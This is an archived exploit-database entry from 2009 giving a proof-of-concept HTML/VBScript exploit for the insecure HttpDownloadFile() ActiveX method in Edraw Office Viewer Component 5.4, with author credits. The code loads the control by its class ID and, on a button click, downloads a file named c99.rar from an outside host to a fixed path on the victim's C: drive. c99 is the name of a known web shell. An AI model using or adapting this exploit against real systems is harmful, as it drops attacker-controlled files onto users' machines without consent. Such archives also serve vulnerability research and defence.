EDraw Office Viewer 5.4 - 'HttpDownloadFile()' Insecure Method

EDB-ID:

7762

CVE:

N/A




Platform:

Windows

Date:

2009-01-14


Edraw Office Viewer Component v5.4 HttpDownloadFile() Insecure Method



Founded By : Cyber-Zone
E-mail     : Paradis_des_fous@hotmail.fr
Home       : WwW.Exploiter5.CoM
GreetZ     : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum , BayHay , All Mgharba Wahed wahed Oujda 2009







<object classid='clsid:6BA21C22-53A5-463f-BBE8-5CF7FFA0132B' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  On Error Resume Next
    test.HttpDownloadFile "http://exploiter5.com/Cyber-Zone/c99.rar", "c:\Cyber-Zone\c99.rar"
    MsgBox("Done!")
 End Sub
</script>
</span>
</code></pre>

# milw0rm.com [2009-01-14]